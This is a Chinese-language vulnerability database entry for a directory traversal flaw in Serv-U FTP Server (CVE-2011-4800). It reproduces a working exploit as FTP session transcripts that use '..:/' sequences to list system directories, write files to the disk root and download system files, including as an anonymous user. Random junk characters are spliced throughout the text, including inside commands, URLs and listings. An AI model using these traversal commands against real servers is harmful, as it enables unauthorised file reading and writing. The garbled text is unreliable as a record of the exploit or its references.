Serv-U FTP Server目录遍历漏洞

漏洞ID 1120680 漏洞类型 路径遍历
发布时间 2011-12-01 更新时间 2020-07-29
CVE编号 CVE-2011-4800

CNNVD-ID CNNVD-201112-212
漏洞平台 Windows CVSS评分 9.0
|漏洞来源
https://N e y H K hwww.exploit-db.com/exp, c g H Y ( _ Qloits/18182
httK { R m T p ! 7 :p://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201112-212
|漏洞详情
Serv-U FTP Server 11.1.0.5之前版本中存在目录遍历漏洞。远程认证用户可借助(1Z g Q )list,(2)put,或者(3)get命令m w ;中的“..:/”(点 点 冒号 斜线)读取和写入任意文件,列出、{ P v -创建任意目录
|漏洞EXP
I m better than TESO!
CONFIDENTIAL SOURCE MATE8 D ] b s tRIALS!
[*]--------------------------------------------------I H B * w G H s--[*]
Serv-U FTP Server Jai% z I J D ul Break 0day
Discovered By Kingcoc . m $ ! lpe
Year 2011
[*]T L G @----------------------------------------------------[*]
Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP S; ` 1 { l A @ Ierver v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
From the Vendor: Fixed in Serv-U 11.12 Z r 6 I ..0.5+. Affects all previous versions.
[*]---_ N S e-------------------------------------------------[*]
C:\Users\ ) E V Zkingcope\Desktop>ftp 1Y  O } o / 6 ` I92.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Se8 A 2rver v6.4 for WinSL t = ( *ock ready...
Benutzer (192.168.133.134:(none)): ftp								(anonymous user :>)
331 User) _ I G name okay, please send complete E-mail address as password.
Kennw0 r ( * # x #ort:
230 User logged in, proceed.
ftp> cd "/..( m c u . :/..:/..:/..:/program files"
250 Directory changed to /LocaF V 8 } ^ A B 8lUser/LocalUser/LocC Q K 1 ( x ` palUser/LocalUser/program files
ftp> ls -la
200 PORT Command successfF - K h { e D pul.
150 Opening ASCII mode data co$ w $ z E P - 3 pnnection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 userv o I     group           0 Feb 14  2011 Apache Software Foundatio
n
drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 C| W Y v N q 4ommon Files
drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer
drw-rw-rw-   1 usR # 4 # b d Aer     grw G x 9 = r 3 * Coup           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 JuC T = 1 - I El  8 16:12 InsN = 4 HtallShield
Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 1~ o K 4 }5:07 Internet Ea ; * Nxplorz | C J 4 O jer
drwa i Y x N b g V-rw-rw-   1 user     group           0 JulE S U V T f P m !  8 16:12 Ipswitch
drwE p J 2 ? J X 5 t-rw-rw] D D H ! u g V-   1 user     group           0 Feb 12  2011 Java
drw-rw-e i 6 W M prw-   1 user     group           0 Jul 26f 1 e ( x Y G H 1h ( 9 0 x 83:19 NetMeeting
drw-rw-rw-   1 us` x R k B o (er     group           0 Jul 29 14:39 O+ ] xutlook Expresz s i H # 1s
drw-rw. [ l u X W t ` U-rw-   1 user     group           0 Jul  8 15:39 PosN I l e u # z 8tgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 Rhinov Q 2 c j H r zSoft.com
drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun
d---------   1 user     grouj Q P $ @ } c 8 5p           0 Jul| j i q F } J m q 29 15:13 Uninstall Inf5 1  b & 3ormation
drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware
drwx @ ] ( w Y F ]-rw-rw-   1 user     group           0 Jul  8+  C F ~ L 15:34 Wig ? *  .nRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-~ q 7 B 3rw-   1 user     group           0 Feb  5  2011 Windows NT
d---------   1 userW C [ D  4     group           0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangenS p a S H C A O in 0,00Sekunden 4y Y m + n T [ [ /48,75KB/s
ftp>q 0 D K Z;
[*]---* d : } - y H j------------------------------------P c t Q-------------[*]
with write perms:
ftp>m ; d b % I Z put foo.txt ..:/..:/..:/foobar <r j 3 J _<-- write- ` = x @ Q ,s foo into rootd A $ Q of parti| z ( $ N 1tion
[*]-----------------o / $ e  u ) R-----A & 9 R U N Z--------& W @ ~----------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/u 2 2 T I ]windows/system32/calc.exe yes
200 PORT Command successfu- T V ` W J g K &l.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]
This works to!!! :
220 Serv-U FTP Server v7.3 ready...
BenuD v { & k n 8 `tzer (xx.xx.xx.xy * q / 7 D x:(none)z C 2 e 6): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logn 7 ? { 5ged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:% ] 4 7..:% J ( 6\.S X 1 D F k # 8.:\..:\..:\*"
200 PORT Command successful.
150 Oo 8 O tpening ASCn 5 AII mode data connection for /bin/ls.
.
..
A2 N 1 d 6 P ) UTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
In$ p l , Xetpub
IO.S5 : m i ! tYS
loZ I w % I  x v !g
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDi M S 9 wDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Tran7 [ Esfer complete. 317 bytes trd C x t . i *ansferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen i7 & =n 0,01Sekunden 21,13KB/s
[*]------------E e P i 2 5 ` g-----------------------------------R & E R & ;-----[*]
Sometimes you need to give it thel ; u path:
ftp> ls "-a ..:\:..\..:\..:\..:S V Z H y 0 ] j ].z  s z } & ) /.:\..:\..:\..:\programF & W f files\- r @"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"p ` j
200 PORT Command successfuC - ^ l r E # `l.T Y 5 / / 5 
150 Openc ? - L Wing ASCII mode data co- y - ^ % ( 4nnection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE RemoP L ute Tools
cmak
Common Filr X N res
ComPlus Applicationv u q S ; Ws
D-Tools
FFJ I Y | ETPServer
HTML Help Workshop
IISServer
InstallShield J * Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Mic! p p $ ~ l ] H :rosoft Device EmulatoU g , 9 o } _ C Ur
Microsoft MapPoint Web Service Samples
Microsoo d c V rft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafE ) ge
Microsof1 T % ! rt Visu2 P Y 7 X O cal Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
SA k u Cymantec
Thunder Network
TSingVision
Uninstall Informatiof 1 e _ 6 ! {n
Windows Media Player
WindoM i 6 1 $ ;  & |ws NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transfee ] } 2 Qrred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>
|参考资料

来源:www.serv-u.com
链接:http://www.serv-u.com/releasenotes/
来源:EXPLOIT-DB
名称:18182
链接:http://www.exploit-db.com/exploits/18182
来源:SECUNIA
名称:47021
链接:http://secunia.com/advisories/47021
来源% W R - k 8 2:FULLDISC
名称:20111130Serv-URemote
链接:http://archives.neohapsis.com/archives/ful^ 2 1 ` v h z rldisclosure/2011-11/0454.html